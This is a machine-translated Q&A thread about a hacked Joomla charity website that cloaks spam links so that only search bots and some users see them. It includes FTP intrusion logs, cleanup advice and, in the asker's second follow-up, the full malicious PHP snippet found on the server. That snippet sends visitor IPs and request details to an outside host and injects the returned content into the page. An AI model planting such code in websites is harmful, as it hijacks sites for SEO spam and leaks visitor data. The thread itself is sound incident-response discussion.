外部查看网站时添加的恶意软件代码

信息安全 网络服务器 恶意软件
2021-09-07 20:58:44

请看底部的第二次跟进!(现在添加了真正的恶意代码!...ish)


在这个问题的提示下,我注意到我大学的学生慈善组织在他们的网站上有一个有趣的问题,到目前为止我一直无法找到原因。(抱歉,如果这在 ServerFault 上会更好,但服务器本身似乎没有任何问题,更多的是恶意软件问题!)

他们的网站http://duck.dsu.org.uk/在页面底部有一大堆色情/恶意软件链接(对我来说看起来像这样),但我认为,只有当你从O2 宽带连接。如果您在大学的网络或其他 ISP 中查看它,则底部根本不会显示任何内容,而且不出所料,在 CMS 管理页面中,模板或页面中都不会显示任何内容。

我 99% 确定服务器不在大学的网络内,查看它的 IP(认为它是由“A Small Orange”托管的)。我绝对不是唯一看到此问题的人,尽管我不确定它是否仅针对单个英国 ISP,O2 宽带(另一个 ISP 的朋友,TalkTalk 已确认他什么也没看到)。在此之前,我从未见过这样的事情,这不是服务器被黑客入侵并将代码输入页面的简单案例。

我将不胜感激有关解决此问题的路线的任何想法,有关可能导致此问题的任何想法以及任何其他建议!

谢谢。


对,现在作为前一个的后续(感谢大家的帮助),我现在已经成功说服网络托管公司给我 SSH 访问权限。我发现该.htaccess文件已被修改,当前.htaccess文件如下:link,我假设这至少是问题的一部分。从清理的角度来看(在前进/再次清理站点方面),我知道我应该擦除整个服务器并重新开始。

但是,它是一个共享托管服务器,所以我无法擦除它,因为我无法控制整个服务器。我已经向网络主机商指出它已被黑客入侵,他们的建议是:

该帐户是一个共享主机帐户,但访问权限仅限于该帐户本身。用户级别的妥协不能对服务器本身进行任何修改。

由于服务器上的任何内容都没有受到损害(只有您的帐户),因此提供的越狱访问权限足以让您调查和清理此帐户。

这是真的?我可以正确清理它吗?我猜如果他们在我的网站上运行的软件(即Joomla)中使用了漏洞,那么是的,它只是我的服务器的一部分被攻破了。但是,如果它是服务器运行的操作系统中的一个漏洞,那么显然整个问题都可能受到损害 - 有没有办法解决它可能是什么?

在之前的链接中:我已经看到并阅读了所有这些

...我现在有日志显示他们做了什么:

Thu Feb 02 14:35:46 2012 0 213.5.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:49 2012 0 213.5.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:53 2012 0 213.5.xxx.xxx 34957 /home/durhamdu/public_html/libraries/joomla/environment/url.php a _ i r durhamdu ftp 1 * c

Mon Apr 09 04:21:53 2012 0 128.127.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:00 2012 0 128.127.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:06 2012 0 128.127.xxx.xxx 1457 /home/durhamdu/public_html/mooving/check.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:09 2012 0 128.127.xxx.xxx 17986 /home/durhamdu/public_html/mooving/laundro.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:18 2012 0 128.127.xxx.xxx 52457 /home/durhamdu/public_html/.htaccess a _ i r durhamdu ftp

引用的文件不再存在,但链接仍然显示,即使我更改了可疑.htaccess文件的文件名。唔...


好的,所以在第二次跟进中,我现在找到了恶意代码,供大家阅读:

<?php   
// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $sReferer = '';
    if(isset($_SERVER['HTTP_REFERER']) === true)
    {
        $sReferer = strtolower($_SERVER['HTTP_REFERER']);
    }
    $stCurlHandle = NULL;
    if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    } else
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    }
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = curl_exec($stCurlHandle); 
    curl_close($stCurlHandle); 
    echo $sResult; // Statistic code end
?>

我现在显然已经删除了它,并且即将修补 Joomla 安装.. 感谢大家的帮助!:-)

4个回答

我相信服务器已经过修改,因此它只提供带有某些访问它的人的链接的页面

当您查看页面的 Google 缓存时,这一点很明显:http ://webcache.googleusercontent.com/search?q=cache:Tey48OeBDBgJ:duck.dsu.org.uk/+&cd=1&hl=en&ct=clnk&gl=uk它显示了屏幕截图中的链接。

这是一种常用的策略,因此对于网站的用户来说,链接不会出现,但会出现在搜索引擎上。这样做是因为这些链接用于SEO 攻击,而肇事者只关心搜索引擎看到这些链接。

似乎使用的任何技术都会错误地将 O2 宽带用户识别为搜索引擎机器人,因此会显示链接。

另一种可能性是该页面已删除链接,但 O2 和 Google 都在提供该页面的缓存版本,但链接仍处于打开状态

听起来 Web 服务器可能已被入侵。

坏人已经开始偷偷摸摸了。一些坏人不会天真地在页面中插入链接,而是会安排只有某些用户才能看到网页的修改版本。(我确实看到过使用 Referer 标头完成此过滤,但我听说它也是通过 IP 地址完成的。)

如果服务器已被入侵,请搜索此站点以了解如何从黑客攻击中恢复。基本上,您将不得不“从轨道上核对它”:擦除、重新格式化、从头开始重新安装、更新所有软件、锁定服务器、从旧的已知良好备份中恢复数据,然后才将它带上回到公共互联网上。

我的一位客户在安装 Joomla 时遇到了同样的问题。我追踪到以下文件:

../public_html/libraries/joomla/environment/url.php

../public_html/templates/THEME_NAME/index.php

url.php 文件是一个虚拟文件,所以只需删除那个文件。索引文件有点混乱。我所做的只是删除文件夹中的一个,然后从同一主题的另一个安装中上传一个新的。如果您愿意,您可以逐行挑选黑客,但如果您在其他地方使用过主题,只需将好的版本复制到被黑客入侵的网站。

这似乎已经成立,所以我相信这是它造成的唯一损害。

黑客似乎旨在将 IP 地址和计算机详细信息发送到电子邮件地址,大概这样他们就可以有效地针对您的 PC。不要发邮件!

也许你的 ISP 有 DNS 转换器恶意软件,它会将用户引导到另一个类似于大学网络服务器的网站尝试浏览该网站,它的 IP 地址对我来说是 184.173.73.180,当你 ping 网络服务器时你得到什么 IP 地址。 ..?